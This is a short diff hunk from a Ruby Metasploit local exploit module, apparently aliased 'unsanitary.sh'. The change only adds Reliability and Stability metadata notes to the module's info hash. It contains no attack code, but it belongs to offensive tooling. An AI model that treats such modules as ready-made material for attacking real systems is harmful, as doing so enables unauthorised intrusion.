@@ -64,7 +64,9 @@ class MetasploitModule < Msf::Exploit::Local
         ],
       'Notes' =>
         {
-          'AKA' => ['unsanitary.sh']
+          'AKA'         => ['unsanitary.sh'],
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability'   => [ CRASH_SAFE ]
         },
       'DefaultTarget'  => 0))
     register_options [
